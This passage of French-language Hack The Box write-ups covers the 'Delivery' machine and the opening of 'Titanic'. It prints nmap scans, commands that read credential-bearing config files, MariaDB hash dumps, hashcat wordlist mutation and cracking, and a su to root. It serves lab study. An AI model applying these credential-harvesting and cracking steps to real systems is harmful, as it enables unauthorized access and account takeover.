class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Delivery<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- -T4 -vvv 10.10.10.222 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.9p1 Debian 10+deb10u2 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCq549E025Q9FR27LDR6WZRQ52ikKjKUQLmE9ndEKjB0i1qOoL+WzkvqTdqEU6fFW6AqUIdSEd7GMNSMOk66otFgSoerK6MmH5IZjy4JqMoNVPDdWfmEiagBlG3H7IZ7yAO8gcg0RRrIQjE7XTMV09GmxEUtjojoLoqudUvbUi8COHCO6baVmyjZRlXRCQ6qTKIxRZbUAo0GOY8bYmf9sMLf70w6u/xbE2EYDFH+w60ES2K906x7lyfEPe73NfAIEhHNL8DBAUfQWzQjVjYNOLqGp/WdlKA1RLAOklpIdJQ9iehsH0q6nqjeTUv47mIHUiqaM+vlkCEAN3AAQH5mB/1 </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAiAKnk2lw0GxzzqMXNsPQ1bTk35WwxCa3ED5H34T1yYMiXnRlfssJwso60D34/IM8vYXH0rznR9tHvjdN7R3hY<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEV5D6eYjySqfhW4l4IF1SZkZHxIRihnY6Mn6D8mLEW7 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> nginx 1.14.2 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.14.2 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Welcome </span></span><span class="line"><span class="cl">8065/tcp open unknown syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">400</span> Bad Request </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/plain<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Connection: close </span></span><span class="line"><span class="cl"><span class="p">|</span> Request </span></span><span class="line"><span class="cl"><span class="p">|</span> GetRequest: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.0 <span class="m">200</span> OK </span></span><span class="line"><span class="cl"><span class="p">|</span> Accept-Ranges: bytes </span></span><span class="line"><span class="cl"><span class="p">|</span> Cache-Control: no-cache, max-age<span class="o">=</span>31556926, public </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Length: <span class="m">3108</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Security-Policy: frame-ancestors <span class="s1">&#39;self&#39;</span><span class="p">;</span> script-src <span class="s1">&#39;self&#39;</span> cdn.rudderlabs.com </span></span><span class="line"><span class="cl"><span class="p">|</span> Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8 </span></span><span class="line"><span class="cl"><span class="p">|</span> Last-Modified: Fri, <span class="m">21</span> Feb <span class="m">2025</span> 11:56:08 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Frame-Options: SAMEORIGIN </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Request-Id: 518yfkngnbbmtm9xgi7thkpkdr </span></span><span class="line"><span class="cl"><span class="p">|</span> X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Fri, <span class="m">21</span> Feb <span class="m">2025</span> 12:00:01 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;!doctype html&gt;&lt;html <span class="nv">lang</span><span class="o">=</span><span class="s2">&#34;en&#34;</span>&gt;&lt;head&gt;&lt;meta <span class="nv">charset</span><span class="o">=</span><span class="s2">&#34;utf-8&#34;</span>&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;viewport&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0&#34;</span>&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;robots&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;noindex, nofollow&#34;</span>&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;referrer&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;no-referrer&#34;</span>&gt;&lt;title&gt;Mattermost&lt;/title&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;mobile-web-app-capable&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;yes&#34;</span>&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;application-name&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;Mattermost&#34;</span>&gt;&lt;meta <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;format-detection&#34;</span> <span class="nv">content</span><span class="o">=</span><span class="s2">&#34;telephone=no&#34;</span>&gt;&lt;link re </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTPOptions: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.0 <span class="m">405</span> Method Not Allowed </span></span><span class="line"><span class="cl"><span class="p">|</span> Date: Fri, <span class="m">21</span> Feb <span class="m">2025</span> 12:00:02 GMT </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Content-Length: <span class="m">0</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="mattermost--helpdeskdeliveryhtb">Mattermost / helpdesk.delivery.htb </h3><p>On peut poster des tickets. Lorsqu&rsquo;on poste un ticket on nous donne un numero et une email auxquelle on peut ecrire par exemple: <a class="link" href="mailto:1239870@delivery.htb" >1239870@delivery.htb</a></p> <p>On a aussi un serveur &ldquo;Mattermost&rdquo; avec une page de login sur lequel on peut créer un compte avec l&rsquo;email: <a class="link" href="mailto:1239870@delivery.htb" >1239870@delivery.htb</a></p> <p>On nous demande une confirmation. On recoit cette email&hellip; directement sur le status du ticket crée précédemment !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token<span class="o">=</span>49opc49pbwfahgew54koaa699uawqjjxt3xpanuwpte3jgf6etkczaprg8487und<span class="p">&amp;</span><span class="nv">email</span><span class="o">=</span>1568729%40delivery.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="internal-channel">Internal Channel </h3><p>On obtient un accès a la plateforme après avoir cliqué sur le lien de confirmation. On rejoint l&rsquo;équipe &ldquo;internal&rdquo; qui donnne accès à un channel internal avec des messages !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">9:29 AM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">@developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail! </span></span><span class="line"><span class="cl">9:30 AM </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Also please create a program to <span class="nb">help</span> us stop re-using the same passwords everywhere.... Especially those that are a variant of <span class="s2">&#34;PleaseSubscribe!&#34;</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">10:58 AM! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PleaseSubscribe! may not be in RockYou but <span class="k">if</span> any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases. </span></span></code></pre></td></tr></table> </div> </div><p>maildeliverer:Youve_G0t_Mail!</p> <h3 id="maildeliver-account-user-flag">maildeliver account: user flag </h3><p>Il suffit de se connecter en ssh avec les creds de &ldquo;maildeliver&rdquo; !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Delivery<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh maildeliverer@delivery.htb </span></span><span class="line"><span class="cl">maildeliverer@delivery.htb<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Linux Delivery 4.19.0-13-amd64 <span class="c1">#1 SMP Debian 4.19.160-2 (2020-11-28) x86_64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The programs included with the Debian GNU/Linux system are free software<span class="p">;</span> </span></span><span class="line"><span class="cl">the exact distribution terms <span class="k">for</span> each program are described in the </span></span><span class="line"><span class="cl">individual files in /usr/share/doc/*/copyright. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent </span></span><span class="line"><span class="cl">permitted by applicable law. </span></span><span class="line"><span class="cl">Last login: Sun Feb <span class="m">23</span> 17:28:33 <span class="m">2025</span> from 10.10.14.3 </span></span><span class="line"><span class="cl">maildeliverer@Delivery:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">maildeliverer@Delivery:~$ cat user.txt </span></span><span class="line"><span class="cl">fe3d.....c5aa </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="db-password">DB password </h3><p>On trouve un fichier avec des creds pour se connecter a la base de données mysql (port 3306):</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">maildeliverer@Delivery:/var/www/osticket$ cat upload/include/ost-config.php </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">/********************************************************************* </span></span><span class="line"><span class="cl"> ost-config.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Database Options</span> </span></span><span class="line"><span class="cl"><span class="c1">## ---------------------------------------------------</span> </span></span><span class="line"><span class="cl"><span class="c1">## Mysql Login info</span> </span></span><span class="line"><span class="cl">define<span class="o">(</span><span class="s1">&#39;DBTYPE&#39;</span>,<span class="s1">&#39;mysql&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">define<span class="o">(</span><span class="s1">&#39;DBHOST&#39;</span>,<span class="s1">&#39;localhost&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">define<span class="o">(</span><span class="s1">&#39;DBNAME&#39;</span>,<span class="s1">&#39;osticket&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">define<span class="o">(</span><span class="s1">&#39;DBUSER&#39;</span>,<span class="s1">&#39;ost_user&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">define<span class="o">(</span><span class="s1">&#39;DBPASS&#39;</span>,<span class="s1">&#39;!H3lpD3sk123!&#39;</span><span class="o">)</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">MariaDB <span class="o">[</span>osticket<span class="o">]</span>&gt; <span class="k">select</span> username,firstname,lastname,passwd,email from ost_staff<span class="p">;</span> </span></span><span class="line"><span class="cl">+---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> username <span class="p">|</span> firstname <span class="p">|</span> lastname <span class="p">|</span> passwd <span class="p">|</span> email <span class="p">|</span> </span></span><span class="line"><span class="cl">+---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> maildeliverer <span class="p">|</span> Delivery <span class="p">|</span> Person <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN</span>/TrrOJt9mFGcy <span class="p">|</span> maildeliverer@delivery.htb <span class="p">|</span> </span></span><span class="line"><span class="cl">+---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ </span></span></code></pre></td></tr></table> </div> </div><p>On trouve bien qu&rsquo;il s&rsquo;agit du même mot de passe qu&rsquo;en ssh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$2</span>a<span class="nv">$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN</span>/TrrOJt9mFGcy:Youve_G0t_Mail! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span></code></pre></td></tr></table> </div> </div><p>La base de données mysql est donc une fausse piste, ce n&rsquo;est pas le hash qui nous intéresse</p> <h3 id="mattermost-config">Mattermost config </h3><p>En cherchant un peu on trouve le fichier de config de mattermost:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">maildeliverer@Delivery:/opt/mattermost/config$ cat config.json <span class="p">|</span> grep user </span></span><span class="line"><span class="cl"> <span class="s2">&#34;TeammateNameDisplay&#34;</span>: <span class="s2">&#34;username&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;DataSource&#34;</span>: <span class="s2">&#34;mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s&#34;</span>, </span></span></code></pre></td></tr></table> </div> </div><p>On a donc une nouvelle base de donnée : mattermost et de nouveaux creds: <code>mmuser:Crack_The_MM_Admin_PW</code></p> <h3 id="récupération-des-hachages">Récupération des hachages </h3><p>On trouve tous les hash de password pour mattermost cette fois, ce qui est nettement plus intéressant à première vu:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">MariaDB <span class="o">[</span>mattermost<span class="o">]</span>&gt; <span class="k">select</span> Username,Password from Users<span class="p">;</span> </span></span><span class="line"><span class="cl">+----------------------------------+--------------------------------------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Username <span class="p">|</span> Password <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------------------------------+--------------------------------------------------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> helloguys <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$nX8mrkBf3qoX5hnoxZKg</span>..9SzAx.oVvfCGelMzzebV6Oa2HI8eq0K <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> surveybot <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> c3ecacacc7b94f909d04dbfd308a9b93 <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$u5815SIBe2Fq1FZlv9S8I</span>.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> 5b785171bfb34762a933e127630c4860 <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$3</span>m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> root <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$VM6EeymRxJ29r8Wjkr8Dtev0O</span>.1STWb4.4ScG.anuu7v0EFJwgjjO <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ff0a21fc6fc2488195e16ea854c963ee <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS</span>.Pduq <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> channelexport <span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> 9ecfb4be145d47fda0724f697f35ffaf <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$s</span>.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> aaaaaa <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$J1d0c</span>.sHFogqV5LoR72JXeFGTQAaAGRVmZJRX1WgyHq/VDiI55..W <span class="p">|</span> </span></span><span class="line"><span class="cl">+----------------------------------+--------------------------------------------------------------+ </span></span></code></pre></td></tr></table> </div> </div><h3 id="hashcat-best-rules---creating-password-list">Hashcat best rules - creating password list </h3><p>On crée une nouvelle liste basée sur le mot clé &lsquo;PleaseSubscribe!&rsquo; comme préciser sur le forum, à l&rsquo;aide des regles de mutation de mot de passe de hashcat :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="nb">echo</span> -e <span class="s1">&#39;PleaseSubscribe!&#39;</span> &gt; base_words.txt </span></span><span class="line"><span class="cl">$ hashcat --stdout base_words.txt -r /usr/share/hashcat/rules/best64.rule &gt; mutated_wordlist.txt </span></span></code></pre></td></tr></table> </div> </div><p>Il ne reste plus qu&rsquo;a bruteforcer les hachages avec la liste générée :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">3200</span> hash.txt ./mutated_wordlist.txt </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: ./mutated_wordlist.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">77</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">1177</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">77</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The wordlist or mask that you are using is too small. </span></span><span class="line"><span class="cl">This means that hashcat cannot use the full parallel power of your device<span class="o">(</span>s<span class="o">)</span>. </span></span><span class="line"><span class="cl">Unless you supply more work, your cracking speed will drop. </span></span><span class="line"><span class="cl">For tips on supplying more work, see: https://hashcat.net/faq/morework </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Approaching final keyspace - workload adjusted. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$2</span>a<span class="nv">$10$VM6EeymRxJ29r8Wjkr8Dtev0O</span>.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 </span></span></code></pre></td></tr></table> </div> </div><h3 id="root-flag">root flag </h3><p>Il ne reste plus qu&rsquo;a se connecter avec le mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">maildeliverer@Delivery:~$ su - root </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">root@Delivery:~# cat /root/root.txt </span></span><span class="line"><span class="cl">eb84.....c688 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/titanic-htb/Fri, 21 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/titanic-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Titanic cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Titanic</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.55</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">developer : <span class="sb">`</span>25282528<span class="sb">`</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Titanic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.55 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.52 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://titanic.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.52 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website-titanichtb--lfi">Website titanic.htb : LFI </h3><p>On a un formulaire qu&rsquo;on peut remplir pour reserver notre voyage. A la fin, ça nous fait telecharger un fichier .json avec notre ticket. Or, si on maniule cet argument ticket= on peut récupérer le contenu de n&rsquo;importe quel fichier</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span 